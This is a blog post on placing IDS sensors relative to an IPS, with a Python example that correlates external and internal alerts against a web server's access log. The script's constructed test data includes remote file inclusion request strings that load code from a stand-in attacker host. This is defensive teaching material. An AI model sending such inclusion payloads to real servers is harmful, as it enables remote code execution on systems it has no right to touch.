work and IT @ 04 Jun 2008 01:24 pm by ayoi
One of my colleagues from the technical support department asked me about the best placement of the internal IDS sensor when a network also has an IPS deployed. So I gave him a simple diagram showing the usual placement of the internal sensor when an IPS is in place as well.
The reason I would place my internal sensor (in this case the DMZ sensor) behind the IPS:
a). I always believe that every preventive measure will be defeated sooner or later. If the DMZ sensor is placed in front of the IPS, what indication do we have when an attack bypasses the IPS?
b). If the sensor is placed in front of the IPS, how do we know whether a particular attack was blocked by the IPS or not?
For this kind of placement, correlating the alerts from the external IDS with those from the internal IDS helps the analyst determine whether an attack bypassed the preventive measures, i.e. the firewalls and the IPS. To strengthen that determination, both alerts are then compared against the logs retrieved from the targeted server.
As an example, say the external sensor produces an alert for a remote file inclusion attempt against the web server. If the internal sensor produces the same alert, the attempt has passed the firewall (of course) and the IPS as well. Only then is the alert sent to the analyst console; if only the external sensor produced the alert, it can be discarded or withheld from the console. It may still be kept for statistical purposes.
A further step, when both sensors produce the same alert, is to compare it against the access log of the targeted web server. If the response code for that request is 200, the alerts are sent to the analyst console; otherwise they are discarded. Note that a 200 only shows the server answered the request instead of rejecting it; it is the strongest hint the access log can give, not proof that the inclusion succeeded, so the analyst still has to confirm on the host.
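The two-stage correlation described above, written out as an added example (this is not code from the original post or from any IDS product). It assumes a simplified CSV alert format for both sensors (timestamp, sensor name, signature, source IP, destination IP, URI) and Apache/nginx combined-log lines from the targeted server; the alert lines and log lines below are constructed, and the sensors and the web server are assumed to log in the same time zone. It goes one step beyond the post's rule by not silently discarding an alert that both sensors saw but that has no matching access-log line, since that usually means a logging or clock problem rather than a harmless attempt.

```python
"""Correlate external and internal IDS alerts with the target web server's access log.

Stage 1: an alert seen only by the external sensor was stopped by the firewall/IPS
         (kept for statistics only).
Stage 2: an alert seen by both sensors is checked against the access log; a 200
         for the same client and URI within a short window is escalated.
Added example with constructed data; not from the original post.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed alerts: ts,sensor,signature,src,dst,uri
ALERTS = """\
2008-06-04T13:01:10,external,WEB-PHP remote file include attempt,203.0.113.7,192.0.2.10,/index.php?page=http://evil.example/shell.txt
2008-06-04T13:01:11,internal,WEB-PHP remote file include attempt,203.0.113.7,192.0.2.10,/index.php?page=http://evil.example/shell.txt
2008-06-04T13:02:30,external,WEB-PHP remote file include attempt,198.51.100.9,192.0.2.10,/page.php?inc=http://evil.example/c.txt
2008-06-04T13:05:00,external,WEB-PHP remote file include attempt,203.0.113.7,192.0.2.10,/admin.php?cfg=http://evil.example/x.txt
2008-06-04T13:05:01,internal,WEB-PHP remote file include attempt,203.0.113.7,192.0.2.10,/admin.php?cfg=http://evil.example/x.txt
"""

# Constructed combined-format access log from the targeted web server (192.0.2.10)
ACCESS_LOG = """\
203.0.113.7 - - [04/Jun/2008:13:01:11 +0800] "GET /index.php?page=http://evil.example/shell.txt HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
203.0.113.7 - - [04/Jun/2008:13:05:01 +0800] "GET /admin.php?cfg=http://evil.example/x.txt HTTP/1.1" 404 312 "-" "Mozilla/4.0"
"""

# Combined log format: client ident user [ts tz] "METHOD URI PROTO" status ...
LOG_RE = re.compile(
    r'(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+?) [+-]\d{4}\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) '
)


def parse_alerts(text):
    """Parse the simplified CSV alert format into dicts (assumed format)."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sensor, sig, src, dst, uri = line.split(",", 5)
        alerts.append({"ts": datetime.fromisoformat(ts), "sensor": sensor,
                       "sig": sig, "src": src, "dst": dst, "uri": uri})
    return alerts


def parse_access_log(text):
    """Parse combined-log lines; the time zone is dropped (same zone assumed)."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        entries.append({"client": m["client"], "uri": m["uri"],
                        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S"),
                        "status": int(m["status"])})
    return entries


def correlate(alerts, weblog, window=timedelta(seconds=30)):
    """Return {(sig, src, dst, uri): verdict} following the post's two stages."""
    by_key = defaultdict(list)
    for a in alerts:
        by_key[(a["sig"], a["src"], a["dst"], a["uri"])].append(a)

    verdicts = {}
    for key, group in by_key.items():
        sensors = {a["sensor"] for a in group}
        if "internal" not in sensors:
            # Stage 1: only the external sensor saw it, so the firewall/IPS stopped it.
            verdicts[key] = "discard_external_only"
            continue
        # Stage 2: both sensors saw it; look for the request in the server's own log.
        internal_ts = min(a["ts"] for a in group if a["sensor"] == "internal")
        _sig, src, _dst, uri = key
        hits = [e for e in weblog
                if e["client"] == src and e["uri"] == uri
                and abs(e["ts"] - internal_ts) <= window]
        if any(e["status"] == 200 for e in hits):
            verdicts[key] = "escalate"
        elif hits:
            verdicts[key] = "discard_not_200"
        else:
            # Beyond the post's rule: reached the server but no log line matched.
            verdicts[key] = "review_no_log_match"
    return verdicts


def console_alerts(verdicts):
    """Only the escalated keys are shown on the analyst console."""
    return sorted(k for k, v in verdicts.items() if v == "escalate")


if __name__ == "__main__":
    result = correlate(parse_alerts(ALERTS), parse_access_log(ACCESS_LOG))
    for key, verdict in result.items():
        print(f"{verdict:24s} {key[1]} -> {key[2]} {key[3]}")
```

On the constructed data only the first RFI attempt reaches the console: the second was seen by the external sensor alone (stopped in front of the DMZ), and the third passed both sensors but the server answered 404, so under the post's rule it is discarded. The window is deliberately short; if sensor and server clocks drift, widen it rather than lose the match, and treat the review_no_log_match outcome as a reason to check the server's logging and time synchronisation.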
But then my colleague said:
“That’s what I’ve explained to them, but their question is: why does the internal sensor generate so few alerts compared to the external sensor?”
I told him, “That means that their IPS has done a good job la!”
“Yeah, that’s what I thought, and I told them that, but they still keep asking the same question.”
I’m out of words…
